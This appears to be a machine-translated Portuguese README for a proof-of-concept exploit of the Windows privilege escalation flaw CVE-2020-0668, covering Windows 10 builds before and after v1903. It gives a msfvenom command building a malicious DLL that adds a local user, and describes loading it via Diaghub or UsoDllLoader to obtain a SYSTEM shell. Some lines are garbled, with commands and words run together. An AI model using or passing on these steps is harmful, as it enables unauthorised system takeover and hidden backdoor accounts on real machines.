
Faça o exploit CVE-2020-0668 funcionar para versão < win10 v1903 e versão >= win10 v1903
Faça o exploit CVE-2020-0668 funcionar para a versão < win10 v1903 e versão >= win10 v1903
O exploit powershell funciona na versão < win10 v1903 com Diaghub.
evil.dll com msfvenom
msfvenom -p windows/x64/exec CMD="net user test test /add" -f dll > evil.dllexp.ps1 com powershellDiaghub.exe C:\ProgramData evil.dll para carregar a dll e adicionar o usuário.
O exploit powershell funciona na versão >= win10 v1903 com UsoDllLoader.
exp.ps1 com powershellUsoDllLoader.exe para obter um shell de sistema
Uma versão de lançamento x86 do SysTracingPoc para a issue,o exploit funciona na versão >= win10 v1903 por causa do UsoLoadDll.
Um PoC .net. Se você der uma olhada em C:\Windows\System32\evil.dll e renomeá-lo como evil.txt.
Você verá que não é um arquivo dll. Apenas um log de rastreamento nele.
Um PoC powershell. Também apenas um log de rastreamento no evil.dll.